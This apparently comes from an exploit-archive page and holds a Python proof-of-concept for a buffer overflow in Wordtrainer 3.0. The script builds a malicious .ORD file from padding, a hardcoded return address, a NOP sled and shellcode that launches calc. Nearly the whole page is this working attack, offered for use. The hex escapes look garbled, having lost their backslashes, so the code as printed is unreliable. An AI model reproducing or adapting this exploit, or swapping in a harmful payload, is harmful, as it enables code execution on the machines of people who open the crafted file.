Home / exploits Wordtrainer 3.0 Buffer Overflow
Posted on 12 April 2011
#!/usr/bin/python # #[+]Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability #[+]Date: 12�42011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.wordtrainer.net/software/files/wt307shw_exe/wt307shw.exe #[+]Version: 3.0 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # # from struct import pack from time import sleep print """ Exploit Buffer Overflow Wordtrainer 3.0 Created BY C4SS!0 G0M3S E-mail Louredo_@hotmail.com Site www.exploit-br.org """ buf = ("x41" * 868) buf += pack('<L',0x00430363) buf += ("x90" * 10) buf += ("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" #Shellcode WinExec("calc",0) "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" "x7fxe8x7bxca") buf += "x41" * (2000-len(buf)) head = ("x47x4Cx4Fx53x4Fx52x0Dx0Ax31x0Dx0Ax0Dx0Ax20x0Dx0A") head += (buf+" ") print "[+]Creating the Exploit File..." sleep(1) FILE = open("Exploit.ord","wb") FILE.write(head) FILE.close() print "[+]File Created With Success " sleep(2)
